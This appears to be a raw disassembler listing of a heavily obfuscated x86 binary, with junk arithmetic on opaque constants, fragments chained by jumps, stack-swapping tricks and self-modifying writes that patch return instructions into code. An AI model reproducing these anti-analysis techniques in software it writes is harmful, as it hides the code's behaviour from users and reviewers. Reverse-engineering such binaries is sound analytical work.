; START	OF FUNCTION CHUNK FOR sub_440643

loc_44C98B:				; CODE XREF: sub_440643:loc_4488F1j
		xchg	eax, [esp+0]
		call	sub_4424A6
		mov	[ebp+var_10], eax

loc_44C996:				; CODE XREF: sub_455F71:loc_43BBD8j
		cmp	[ebp+var_10], 0
		jz	loc_43FA8C
		jmp	loc_43BFA9
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_44C9A5:				; CODE XREF: sub_456A52+944j
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4546F5

loc_44C9AB:				; CODE XREF: sub_4546F5+9j
		jmp	loc_43F9F4
; END OF FUNCTION CHUNK	FOR sub_4546F5

; =============== S U B	R O U T	I N E =======================================



sub_44C9B0	proc near		; DATA XREF: sub_43D285+726Bo
					; hvvrg7ie:004588BCo

; FUNCTION CHUNK AT 00442DE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044852B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044D518 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DDFF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450820 SIZE 00000005 BYTES

		call	sub_45B6DB

loc_44C9B5:				; DATA XREF: sub_448C46-F976o
		xor	eax, eax
		mov	[ebp-8], eax

loc_44C9BA:				; CODE XREF: sub_44C9B0:loc_442DE4j
		jo	loc_448537
		mov	eax, [ebp-0Ch]
		cmp	byte ptr [eax],	0
		jnz	loc_44DDFF
		mov	eax, [ebp-4]
		jmp	loc_44D518
sub_44C9B0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		add	ebp, 28F0CACBh
		xchg	ecx, [edi]
		jmp	loc_43E4A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_44C9E1:				; CODE XREF: sub_456CD4-19500j
					; hvvrg7ie:0044B2F7j
		jnz	loc_4508D1
; END OF FUNCTION CHUNK	FOR sub_456CD4
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44C9E7:				; CODE XREF: sub_450434+3AF1j
		jmp	loc_43FF88
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		mov	ebp, [esi]
		mov	ebp, ebx
		jmp	loc_4508D1
; ---------------------------------------------------------------------------

loc_44C9F5:				; CODE XREF: hvvrg7ie:loc_442254j
		push	offset sub_43E82E
		jmp	locret_4571FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457532

loc_44C9FF:				; CODE XREF: sub_457532+Cj
		mov	[edx], eax
		jmp	loc_43983D
; END OF FUNCTION CHUNK	FOR sub_457532
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_44CA06:				; CODE XREF: sub_44E3B3:loc_454A6Bj
		call	sub_43CA70

loc_44CA0B:				; CODE XREF: sub_447662+134B0j
		jmp	loc_43FBA8
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_71. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580B4

loc_44CA11:				; CODE XREF: sub_4580B4+16j
		jmp	loc_4598DE
; END OF FUNCTION CHUNK	FOR sub_4580B4
; ---------------------------------------------------------------------------

loc_44CA16:				; CODE XREF: hvvrg7ie:00457DB6j
		jmp	loc_445E51
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_44CA1B:				; CODE XREF: sub_450F97-8603j
		jmp	loc_4538CD
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569F5

loc_44CA20:				; CODE XREF: sub_4569F5:loc_43B759j
		xchg	esi, [esp+0]
		mov	esp, ebp
		xchg	eax, [esp+0]
		mov	ebp, eax
		pop	eax

loc_44CA2B:				; CODE XREF: sub_4414F6:loc_44ABB2j
		push	3DE8E068h
		pop	eax
		and	eax, 5DDAA725h
		jmp	loc_44FCA4
; END OF FUNCTION CHUNK	FOR sub_4569F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E34F

loc_44CA3C:				; CODE XREF: sub_44E34F:loc_45A3ACj
		sbb	esi, edi
		sbb	ecx, 0C55778B2h
		xchg	ebx, edi
		jmp	loc_45540B
; END OF FUNCTION CHUNK	FOR sub_44E34F

; =============== S U B	R O U T	I N E =======================================



sub_44CA4B	proc near		; DATA XREF: sub_4590E0:loc_446082o

; FUNCTION CHUNK AT 0043DCCC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004543DB SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00454A1B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004595BE SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00459D21 SIZE 00000006 BYTES

		pop	ebx
		mov	eax, [ebp-4]
		add	eax, 0A8AC2939h
		call	sub_455B13

loc_44CA5A:				; CODE XREF: sub_4514A2+11j
		jz	loc_4595BE
		jmp	loc_43DCCC
sub_44CA4B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	ebx
		push	91DAD8A6h
		pop	ebx
		xor	ebx, 6D4FAEA8h
		jmp	loc_43AC57
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439873

loc_44CA77:				; CODE XREF: sub_439873:loc_440904j
					; sub_439873+70A2j
		or	eax, 0C775A4F1h
		add	eax, 8AFE9EE3h
		add	eax, ebp
		add	eax, 9583A11Ah
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_441C1D
		jmp	loc_441464
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_44CA9B:				; CODE XREF: hvvrg7ie:0043E25Aj
					; sub_44059F:loc_45AE7Cj
		cdq
; END OF FUNCTION CHUNK	FOR sub_44059F

; =============== S U B	R O U T	I N E =======================================



sub_44CA9C	proc near		; CODE XREF: sub_4403B6+6p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441839 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00444352 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C7BE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004565FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AA7C SIZE 00000005 BYTES

		xchg	ebx, [esp+4+var_4]
		pop	ebx
		add	eax, 4CFEAECCh

loc_44CAA6:				; CODE XREF: sub_43D285+1E2D2j
		mov	eax, [eax]
		add	eax, 4
		jmp	loc_4565FA
sub_44CA9C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44CAB0	proc near		; DATA XREF: sub_4584A8+Ao

; FUNCTION CHUNK AT 0044C28D SIZE 0000000F BYTES

		push	26DF163Fh
		pop	ebx
		add	ebx, 19F842FFh
		and	ebx, 2C134C37h
		add	ebx, 2E890Ah
		mov	[ebx], eax
		jmp	loc_44C28D
sub_44CAB0	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_341. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44CAD0:				; CODE XREF: hvvrg7ie:00458E01j
		jmp	loc_44F71F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F39A

loc_44CAD5:				; CODE XREF: sub_44F39A+Dj
		jmp	nullsub_111
; END OF FUNCTION CHUNK	FOR sub_44F39A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44CADA:				; CODE XREF: sub_454099-6221j
		jmp	loc_43AEC2
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_44CADF:				; CODE XREF: hvvrg7ie:0043FAE6j
		jmp	loc_45244D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44980B

loc_44CAE4:				; CODE XREF: sub_44980B-D11Dj
		jmp	loc_43CBAA
; END OF FUNCTION CHUNK	FOR sub_44980B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_44CAE9:				; CODE XREF: sub_440C05-5805j
		jmp	loc_43E6EA
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
		xchg	eax, [esp]
		mov	edx, eax
		xchg	edi, [esp]
		mov	eax, edi
		pop	edi
		mov	eax, [esp]
		push	edx
		jmp	loc_458BBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44CB02:				; CODE XREF: sub_44D2F8:loc_454587j
		cmp	dword ptr [ebp-4], 3
		jnz	loc_45486B
		jmp	loc_44C470
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44CB11:				; CODE XREF: sub_43D285-2D44j
		adc	ebp, ebx
		jmp	loc_4444E8
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8AB

loc_44CB18:				; CODE XREF: sub_43F8AB+Bj
		xchg	edx, [esp+0]
		mov	ebp, edx
		pop	edx
		mov	eax, ds:dword_452324
		or	eax, eax
		jnz	loc_44AEE4
		jmp	loc_453A47
; END OF FUNCTION CHUNK	FOR sub_43F8AB
; ---------------------------------------------------------------------------

loc_44CB31:				; DATA XREF: sub_43A3C2+9o
		push	edx
		mov	edx, ebx
		xchg	edx, [esp]
		push	379F6DDBh
		jmp	loc_4435BA

; =============== S U B	R O U T	I N E =======================================



sub_44CB41	proc near		; CODE XREF: hvvrg7ie:0043AEE5j
					; hvvrg7ie:0043DF99p
		xchg	ebx, [esp+0]
		pop	ebx
		xor	eax, 490FD634h
		call	sub_450C5A
		mov	ds:off_41D0F8, eax
		lea	eax, loc_43F93F
		mov	byte ptr [eax],	0C3h
		jmp	loc_43F93F
sub_44CB41	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44CB64	proc near		; CODE XREF: sub_456F9F-1A886j
					; sub_43E507+4p ...

var_18		= dword	ptr -18h
var_6		= word ptr -6
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439233 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DBEC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043EC2A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443D15 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00445214 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00446250 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00446399 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449746 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044FA62 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004501F8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A8DB SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	[ebp+var_4], eax
		jmp	loc_43EC2A
sub_44CB64	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B9C9

loc_44CB70:				; CODE XREF: sub_43B9C9+14177j
		call	sub_44036B

loc_44CB75:				; CODE XREF: sub_458F43-2AC2j
		jmp	loc_44705B
; END OF FUNCTION CHUNK	FOR sub_43B9C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_44CB7A:				; CODE XREF: sub_43A839+11D73j
		jnz	loc_457CA2
; END OF FUNCTION CHUNK	FOR sub_43A839
; START	OF FUNCTION CHUNK FOR sub_45A91B

loc_44CB80:				; CODE XREF: sub_45A91B+6j
		jmp	loc_441AC9
; END OF FUNCTION CHUNK	FOR sub_45A91B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_44CB85:				; CODE XREF: sub_453422+Dj
		jmp	loc_43BB00
; END OF FUNCTION CHUNK	FOR sub_453422
; ---------------------------------------------------------------------------
		xchg	ebx, edi
		sub	ebp, 0D1ED4DAh
		sbb	esi, 6833F8B4h
		or	eax, ebp
		jmp	loc_457C9C
; ---------------------------------------------------------------------------
		mov	[ebp-4], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_443B1C
		jmp	loc_4396A9
; ---------------------------------------------------------------------------

loc_44CBB1:				; CODE XREF: hvvrg7ie:loc_452D3Fj
		pop	ecx
		and	ecx, 8485DE4Ah
		cmp	ecx, 78529265h
		jmp	loc_457CF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_44CBC3:				; CODE XREF: sub_440643-4807j
					; sub_440643+C1CBj
		call	sub_44AA1C

loc_44CBC8:				; CODE XREF: hvvrg7ie:0044F3F6j
		jmp	loc_458A95
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C836

loc_44CBCD:				; CODE XREF: sub_43C836+5j
		jmp	nullsub_97
; END OF FUNCTION CHUNK	FOR sub_43C836
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_204. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451697

loc_44CBD3:				; CODE XREF: sub_451697+4j
		sub	al, 99h
		mov	edx, [ebp-4]
		call	sub_4416C3

loc_44CBDD:				; CODE XREF: sub_453405-F766j
		jmp	nullsub_168
; END OF FUNCTION CHUNK	FOR sub_451697
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_44CBE2:				; CODE XREF: sub_4554E8-17C63j
		mov	eax, [eax]
		call	sub_441242
; END OF FUNCTION CHUNK	FOR sub_4554E8
; START	OF FUNCTION CHUNK FOR sub_441C2A

loc_44CBE9:				; CODE XREF: sub_441C2A+Aj
		jmp	loc_44523C
; END OF FUNCTION CHUNK	FOR sub_441C2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_44CBEE:				; CODE XREF: sub_44955C:loc_44224Fj
		call	sub_45454F

loc_44CBF3:				; CODE XREF: sub_449CB1+D471j
		cmp	dword ptr [ebp-8], 0
		jz	loc_455B5A
		jmp	loc_440619
; END OF FUNCTION CHUNK	FOR sub_44955C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459B45

loc_44CC02:				; CODE XREF: sub_459B45+Dj
		add	edx, 0A3BD0B7Dh
		rol	edx, 0Ch
		test	edx, 8000h
		jmp	loc_458D7C
; END OF FUNCTION CHUNK	FOR sub_459B45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF96

loc_44CC16:				; CODE XREF: sub_43AF96-13Dj
		pop	edi
		xor	ecx, edi
		jmp	loc_455456
; END OF FUNCTION CHUNK	FOR sub_43AF96

; =============== S U B	R O U T	I N E =======================================



sub_44CC1E	proc near		; CODE XREF: sub_43C0DE+1AA0Bj
					; sub_43A839+1D475p

; FUNCTION CHUNK AT 0044A586 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FDE4 SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, ebp
		add	eax, 519068B5h
		push	eax
		jmp	loc_44A586
sub_44CC1E	endp

; ---------------------------------------------------------------------------
		test	ebx, edi
		jmp	loc_451C88
; ---------------------------------------------------------------------------

loc_44CC37:				; CODE XREF: hvvrg7ie:00455E78j
		add	edi, eax
		adc	esi, ebp
		mov	esi, ecx
; START	OF FUNCTION CHUNK FOR sub_448BE8

loc_44CC3D:				; CODE XREF: sub_448BE8:loc_44ACE6j
		or	eax, 6C69A314h
		rol	eax, 1
		add	eax, 683B42h
		jmp	loc_43C76F
; END OF FUNCTION CHUNK	FOR sub_448BE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445DC4

loc_44CC50:				; CODE XREF: sub_445DC4:loc_448D72j
		xchg	edi, [esp+4+var_4]
		call	sub_44CB64
		mov	eax, 19EDC823h
		call	sub_450C5A
		push	ebx
		push	0FFF722DDh
		pop	ebx
		jmp	loc_44444B
; END OF FUNCTION CHUNK	FOR sub_445DC4
; ---------------------------------------------------------------------------
		jmp	ds:off_41D028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466A4

loc_44CC74:				; CODE XREF: sub_4466A4:loc_440B1Fj
					; sub_453B74-9EC8j ...
		xchg	ebp, [esp+4+var_4]
		mov	edx, ebp
		pop	ebp
		jns	loc_4582B6
		mov	eax, [esp+0]
		push	edx
		jmp	loc_45AB6E
; END OF FUNCTION CHUNK	FOR sub_4466A4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_255. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44CC8A:				; CODE XREF: sub_43D285+1D6CFj
		jmp	loc_44D133
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F447

loc_44CC8F:				; CODE XREF: sub_43F447+10946j
		jmp	nullsub_483
; END OF FUNCTION CHUNK	FOR sub_43F447
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_44CC94:				; CODE XREF: sub_44616F+4749j
		jmp	loc_441F39
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446966

loc_44CC99:				; CODE XREF: sub_446966-1E42j
		jmp	loc_450963
; END OF FUNCTION CHUNK	FOR sub_446966
; ---------------------------------------------------------------------------
		xchg	edi, [ebp+0]
		push	edi
		jmp	sub_45903D

; =============== S U B	R O U T	I N E =======================================



sub_44CCA7	proc near		; CODE XREF: hvvrg7ie:0044B2D0j
					; sub_43F98C:loc_44BD52p

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	eax, [esp-4+arg_0]

loc_44CCAE:				; CODE XREF: sub_448BC0:loc_453E19j
		jmp	sub_447162
sub_44CCA7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_44CCB3:				; CODE XREF: sub_43C0DE:loc_446A60j
		test	ebx, ebp
		jmp	loc_442E65
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------

loc_44CCBA:				; CODE XREF: hvvrg7ie:loc_4422D2j
		push	ecx
		push	0E5DA426Bh
		pop	ecx
		and	ecx, 69474FBAh
		jmp	loc_44B677
; ---------------------------------------------------------------------------
		push	edx
		push	6D2A94AFh
		pop	edx
		rol	edx, 8
		push	offset loc_442754
		jmp	locret_4597E0
; ---------------------------------------------------------------------------

loc_44CCE0:				; CODE XREF: hvvrg7ie:loc_443F8Aj
		and	edi, 4B4BF548h
		xor	edi, 0B9867452h
		test	edi, 8000000h
		jmp	loc_450B11
; ---------------------------------------------------------------------------
		mov	[edi], ebp
		jmp	sub_4550CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44CCFE:				; CODE XREF: sub_43F227+44AAj
		xor	eax, 5DB6EAFDh
		rol	eax, 11h
		or	eax, 34D987FFh
		xor	eax, 74E1030Fh
		add	eax, ebp
		add	eax, 77E77866h
		jmp	loc_44B539
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
		mov	ecx, eax
		jmp	sub_448173
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44CD27:				; CODE XREF: sub_43E128+C8B5j
		xchg	esi, edi
		mov	ebx, ebp
		js	loc_446ADC

loc_44CD31:				; CODE XREF: sub_43E128:loc_44890Ej
		push	esi
		push	53141C87h
		pop	esi
		xor	esi, 0B794D12h
		jmp	loc_457CEA
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
		push	offset sub_45B72C
		jmp	locret_445BFF
; ---------------------------------------------------------------------------

loc_44CD4D:				; CODE XREF: hvvrg7ie:00447728j
		jl	loc_43CDED
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_44CD53:				; CODE XREF: sub_4544DD:loc_452097j
		or	eax, 0C924F426h
		add	eax, 697BC68h

loc_44CD5F:				; CODE XREF: hvvrg7ie:loc_44A488j
		xchg	eax, [esp+0Ch+var_C]
		jmp	sub_44BF66
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
		sub	eax, 21E3AACDh
		jmp	sub_44AE37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_44CD72:				; CODE XREF: sub_4403B6+15D75j
		jz	loc_451AFB
		jmp	loc_43A8B2
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
		xor	ebx, 0BBDCD7CFh
		jmp	sub_4410E1
; ---------------------------------------------------------------------------
		test	edx, 0F3CFE275h
		jmp	loc_43C34E
; ---------------------------------------------------------------------------

loc_44CD93:				; CODE XREF: hvvrg7ie:0044550Fj
		jo	loc_446187
		xor	ecx, ebx

loc_44CD9B:				; CODE XREF: hvvrg7ie:0044C01Bj
		jnz	loc_457619
; START	OF FUNCTION CHUNK FOR sub_451BAD

loc_44CDA1:				; CODE XREF: sub_451BAD-648Aj
		or	eax, ds:4000F5h
		xor	eax, 7B43A1D3h
		push	edx
		pushf
		push	0F3B6284Bh
		jmp	loc_4508C7
; END OF FUNCTION CHUNK	FOR sub_451BAD
; ---------------------------------------------------------------------------

loc_44CDB9:				; CODE XREF: hvvrg7ie:0043E303j
		mov	eax, 0BC92A542h

; =============== S U B	R O U T	I N E =======================================



sub_44CDBE	proc near		; CODE XREF: sub_43B7B9+A21p

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	esi, [esp-4+arg_0]
		push	ecx
		push	offset loc_453AE4
		jmp	nullsub_98
sub_44CDBE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_44CDD0:				; CODE XREF: sub_43C0DE:loc_453C44j
		jge	loc_44FE97

loc_44CDD6:				; CODE XREF: hvvrg7ie:0043BCF6j
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
		or	ebx, ebp
		pushf
		mov	ebp, ebx
		not	ebx
		jmp	loc_44C026

; =============== S U B	R O U T	I N E =======================================



sub_44CDE7	proc near		; CODE XREF: sub_44290B-87EBp
		xchg	ebx, [esp+0]
		pop	ebx
		add	eax, [ebp-4]
		xor	edx, edx
		jmp	loc_447457
sub_44CDE7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447D56

loc_44CDF5:				; CODE XREF: sub_447D56-9E4Dj
		jnz	loc_43C041
		popf

loc_44CDFC:				; CODE XREF: sub_43D285:loc_453095j
		call	sub_458F33
		retn
; END OF FUNCTION CHUNK	FOR sub_447D56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB9D

loc_44CE02:				; CODE XREF: sub_45AB9D-805Fj
		jmp	loc_44D0A6
; END OF FUNCTION CHUNK	FOR sub_45AB9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D98D

loc_44CE07:				; CODE XREF: sub_44D98D:loc_44E876j
		jz	loc_44972F
		jmp	loc_4599E2
; END OF FUNCTION CHUNK	FOR sub_44D98D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B6B

loc_44CE12:				; CODE XREF: sub_446B6B+1Aj
		jl	loc_450854

loc_44CE18:				; CODE XREF: sub_4562DC+6j
		jmp	loc_4475C4
; END OF FUNCTION CHUNK	FOR sub_446B6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589A2

loc_44CE1D:				; CODE XREF: sub_4589A2-686Dj
		jmp	sub_45B862
; END OF FUNCTION CHUNK	FOR sub_4589A2
; ---------------------------------------------------------------------------
		cmp	esi, edx
		jmp	loc_44ECC5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E62

loc_44CE29:				; CODE XREF: sub_445E62:loc_44D378j
		not	esi
		adc	eax, ebx
		jmp	loc_4503D3
; END OF FUNCTION CHUNK	FOR sub_445E62

; =============== S U B	R O U T	I N E =======================================



sub_44CE32	proc near		; DATA XREF: hvvrg7ie:00446EFEo
		add	esi, 0AFCEFB8h
		xor	eax, esi
		pop	esi
		push	offset loc_43D5A6

loc_44CE40:				; CODE XREF: hvvrg7ie:loc_44353Aj
		jmp	nullsub_508
sub_44CE32	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_44CE45:				; CODE XREF: sub_450590:loc_44E2CDj
		and	esi, edx
		jmp	loc_43EA00
; END OF FUNCTION CHUNK	FOR sub_450590
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_44CE4C:				; CODE XREF: sub_45038B:loc_445A64j
		jl	loc_45AFEE
		sub	edi, 0C8C3A2Ch
		push	ebx
		jmp	loc_45AFE8
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44CE5E:				; CODE XREF: sub_450434+6E88j
		adc	edx, 964ACFE5h

loc_44CE64:				; CODE XREF: sub_443086:loc_44C323j
		mov	eax, [ebp-4]
		call	sub_4418F0

loc_44CE6C:				; CODE XREF: sub_45AB9D:loc_45B212j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		call	sub_43E60A

loc_44CE78:				; CODE XREF: sub_455B13:loc_458823j
		sub	ebp, ebx
		sbb	ebx, edx
		sbb	eax, 84C0CBCFh
		ror	edi, 12h
		jmp	loc_453C5C
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_44CE8A:				; CODE XREF: hvvrg7ie:00445979j
		jz	loc_43B8EC

; =============== S U B	R O U T	I N E =======================================



sub_44CE90	proc near		; CODE XREF: sub_44C8C7:loc_4393B2p

; FUNCTION CHUNK AT 00447E1B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A80B SIZE 00000016 BYTES

		xchg	edi, [esp+0]
		pop	edi
		adc	ebx, ecx
		jmp	loc_447E1B
sub_44CE90	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_261. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44CE9C:				; CODE XREF: sub_450434-D8B5j
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-0Ch], 4
		jnz	loc_44CEB2
		add	dword ptr [ebp-8], 4
		jmp	loc_4521C9
; ---------------------------------------------------------------------------

loc_44CEB2:				; CODE XREF: sub_450434-3591j
		add	dword ptr [ebp-8], 2
		jmp	loc_43F3FF
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		jnb	loc_44257F
		and	ebp, edx
		jmp	sub_44B3E5

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44CEC8	proc near		; CODE XREF: sub_44191F-27A2p
					; sub_45A234:loc_442D79j ...

var_10		= dword	ptr -10h
var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043A5DA SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043C138 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C8C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D375 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00441026 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00442926 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044D450 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DACB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F6DB SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00455870 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455AF9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455D19 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004578C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457A80 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A59A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045A81D SIZE 00000005 BYTES

		push	esi
		mov	esi, ebp
		xchg	esi, [esp+0]
		mov	ebp, esp
		call	sub_45B9BB
		jmp	loc_43C8C5
sub_44CEC8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44CEDA:				; CODE XREF: sub_45889B-1F04Ej
		jmp	loc_457875
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
		sub	esi, 0D1C779D4h
		adc	esi, 30FCF24Bh
		jmp	sub_440C61
; ---------------------------------------------------------------------------

loc_44CEF0:				; CODE XREF: hvvrg7ie:00459F73j
		call	sub_44F7CF
		push	0D9688EB6h
		shr	eax, 16h
		jmp	loc_44A019
; ---------------------------------------------------------------------------

loc_44CF02:				; DATA XREF: sub_44C2EA-B3C2o
		mov	[edi], eax
		pop	edi
		lea	eax, sub_43F521
		mov	byte ptr [eax],	0C3h
		jmp	sub_43F521

; =============== S U B	R O U T	I N E =======================================



